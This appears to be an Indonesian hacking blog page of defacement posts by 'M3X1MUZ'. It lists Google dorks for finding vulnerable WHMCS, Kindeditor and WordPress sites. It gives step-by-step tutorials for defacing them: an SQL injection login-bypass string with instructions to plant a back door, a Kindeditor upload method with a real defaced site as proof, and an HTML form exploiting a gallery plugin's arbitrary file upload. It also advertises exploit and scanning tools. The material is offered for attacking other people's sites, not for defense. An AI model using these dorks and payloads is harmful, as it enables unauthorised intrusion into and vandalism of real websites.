IDCloudHost | SSD Cloud Hosting Indonesia Web Hosting Murah Yang Terbaik Di Indonesia Banner IDwebhost

Tampilkan postingan dengan label Defacing. Tampilkan semua postingan

SQLI Hunter - SQL Injection HUnter

SQLI Hunter” SQL Injection Hunter 1.0 dari namanya sudah jelas bahwa aplikasi ini berfungsi untuk mencari website yang rentan terhadap serangan SQL Injection. Dilengkapi 4493 Dorks, dan dalam sekali scan mendapatkan 96 hasil. Dilengkapi juga Pencari Login Page Admin.

SQLI Hunter - SQL Injection Hunter

DOWNLOAD DISINI (INSTALL VERSION – Butuh .NET Framework 3.5)
atau
DOWNLOAD DISINI (PORTABLE VERSION)
Selamat mencoba dan menggunakan ðŸ™‚

Salam,

~X~ M3X1MUZ ~X~

SQLI Hunter: SQL Injection Hunter | ~X~ M3X1MUZ ~X~

Posted by : M3X1MUZ
Selasa, 03 April 2018
0 Comments
Kali ini kita akan share sebuah tools yang berguna untuk melakukan testing keamanan terhadap situs yang berbasis wordpress. Dimana hasil dari scan bisa dilihat berupa report dan dikirimkan ke email.
Berikut penampakannya:
aWPVSCAN

aWPScan
Scan Report awPVscan
aWPVSCAN adalah Android WordPress Vulnerability Scanner yaitu aplikasi android ditulis dalam ruby dibuat untuk menemukan kelemahan yang terdapat dalam website yang berbasis WordPress. Dimaksudkan menggunakannya untuk untuk profesional keamanan atau administrator WordPress untuk menilai seberapa besar keamanan website WordPress mereka.
* Tested on Samsung Galaxy Nexus, Jelly Bean 4.1.2
Link download : Google Play
Mirror : Indowebster password:israelserverisdown

Salam,

~X~ M3X1MUZ ~X~

Android WordPress Vulnerability Scanner | ~X~ M3X1MUZ ~X~

Posted by : M3X1MUZ 0 Comments
Berbagi tools untuk melakukan exploit terhadap WHMCS.
WHMCS adalah software untuk manajemen pelanggan, melakukan penagihan dan support terutama untuk keperluan webhosting, tetapi juga bisa untuk jenis bisnis online lainnya. WHMCS memungkinkan Anda untuk mengelola bisnis Anda menjadi lebih baik. dan WHMCS memungkinkan Anda untuk dengan mudah dan efektif mengelola bisnis Anda ketika mengotomatisasi tugas-tugas rutin banyak.
 WHMCS 0-Day Auto Exploiter <= 5.2.8
Berikut ini adalah list untuk google search (google dork):
inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:”Powered by WHMCompleteSolution”
intext:”Powered by WHMCompleteSolution” inurl:clientarea.php
inurl:announcements.php intext:”WHMCompleteSolution”
intext:”Powered by WHMCS”
Berikut ini ada beberapa exploit diantaranya didalam PHP, Phython.
Simpan file dengan nama WHMCS-Fucker.php atau WHMCS-Fucker.py:

Selamat mencoba dan menggunakan.. ðŸ™‚

Salam,

~X~ M3X1MUZ ~X~

WHMCS Ver 5.2.8 0Day Auto Exploiter | ~X~ M3X1MUZ ~X~

Posted by : M3X1MUZ 0 Comments
1. Masukan Dork Berikut ke kotak pencarian Google :
                                                                       inurl:examples/uploadbutton.html
                                                                        inurl:kindeditor

2. Pilih salah satu website yang ingin kalian Deface
3. Tambahkan exploit : 

Exploitnya : /Kindeditor/examples/uploadbutton.html
             http://site.com/exploit

             site.com/Kindeditor/examples/uploadbutton.html

4. Setelah anda memilih website yang akan diDeface,maka akan keluar tampilan seperti ini :


4. Klik upload >> pilih Script deface agan dengan format (.html)
5. tunggu sampai keluar URL hasil upload-an HTML kita


6. Copas link tersebut dan letakkan diakhir URL
Contoh : site.com/link yang terdapat di kolom upload
7. Tara, Anda sudah berhasil Mendeface Dengan Method Kineditor ^_^ 

NB : Hasil Saya : http://www.designcss.org/public/jfk/source/kindeditor-4.0.5/attached/file/20170401/20170401204606_82135.html

Tutorial Deface Method Kindeditor Terbaru Dan Lengkap 2017-2018

Posted by : M3X1MUZ
Minggu, 01 April 2018
0 Comments
Hi all?
now myregan will give you a tutorial deface, admin bypass method.
Okay just go ahead “Read, learn and practice”
Dork, admin login:
inurl:/admin/login.php
Dork, image:
inurl:/admin/uploads/img
inurl:/admin/image
try to develop again according to your instinct, lol.
search target using search engine then click one of the web.
in the login page section, fill in the username and password field with the code below:
‘=”or’
Well, if the website is vuln you can login as admin.
Next step, make the back door.
do not know how to make the back door?
Generally the location of the back door is in:
=> add photos
=> add galery
=> add slider
=> add project
=> add banner
=> add product
another, you can look for it yourself.
how to access the back door?
I assume the process of making the back door has been successful, then right click the file => view image .
can also right-click the file => copy the image location = paste it in a new tab.
After that it’s up to you, what you want to do.
Good luck bro ^_^

~X~ M3X1MUZ ~X~

Deface With Bypass Admin terbaru 2018

Posted by : M3X1MUZ 0 Comments
Kali ini saya akan membuat artikel

Tutorial Deface Dengan WP ARBITRARY DREAM WORK GALLERY FILE UPLOAD

Tanpa basa-basi, yuk kita gass langsung ke point utamanya ^_^


Klik Gambar Agar Jelas
To The Point 

Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (Gunakan otak wibu kalian biar makin fresh)
1. Dorking dulu dengan dork diatas lalu pilih Target kalian (Lihat Gambar)

2. Copy Script dibawah & Simpan di notepad berformat .html (Contoh : maqloegeming.html)
Ambil Disini : Pastebin.com

Atau Copas Disini 
<form action="www.target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>



3. Ganti www.target.com dengan Target kalian (Lihat Gambar - Step by Step Dorking & Up Sc Deface)
  • Step 1


  • Step 2



  • Step 3



  • Step 4


  • Step 5





  • Step 6




  • Step 7


  • Step 8


Mudah kan xD
Jika Kurang Paham Dengan Tutorial Di Atas bisa bertanya dengan saya ^_^


Salam, 
~X~ M3X1MUZ ~X~

Tutorial Deface Dengan WP ARBITRARY DREAM WORK GALLERY FILE UPLOAD

Posted by : M3X1MUZ 0 Comments

- Copyright © M3X1MUZ -